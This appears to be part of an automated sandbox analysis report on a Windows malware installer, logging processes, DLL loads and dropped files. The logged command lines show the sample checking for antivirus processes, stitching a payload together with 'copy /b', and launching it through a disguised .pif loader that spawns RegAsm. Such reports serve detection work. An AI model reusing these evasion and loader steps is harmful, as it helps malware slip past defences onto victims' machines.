                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess created: C:\Program Files (x86)\StrLocalGate\Setup.exe "C:\Program Files (x86)\StrLocalGate\Setup.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess created: C:\StrLocalGate\MmReveals.exe "C:\StrLocalGate\MmReveals.exe"Jump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe" Jump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\iJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\iJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: version.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: slc.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\StrLocalGate\MmReveals.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpWindow found: window name: TMainFormJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpAutomated click: Next
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpAutomated click: Next
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpAutomated click: OK
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic file information: File size 4303615 > 1048576
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic PE information: section name: .didata
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drStatic PE information: section name: .didata
                    Source: is-RI2MT.tmp.1.drStatic PE information: section name: .didata
                    Source: Setup.tmp.2.drStatic PE information: section name: .didata
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00538AA5 push ecx; ret 14_2_00538AB8
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeCode function: 20_2_06423B5F push 18068B92h; ret 20_2_0642401D
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeCode function: 20_2_064242C4 pushad ; ret 20_2_064242DD
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeCode function: 20_2_06424B01 pushfd ; retf 20_2_06424B02

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\154571\Eco.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifFile created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeJump to dropped file
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeFile created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpJump to dropped file
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\154571\Eco.pifJump to dropped file
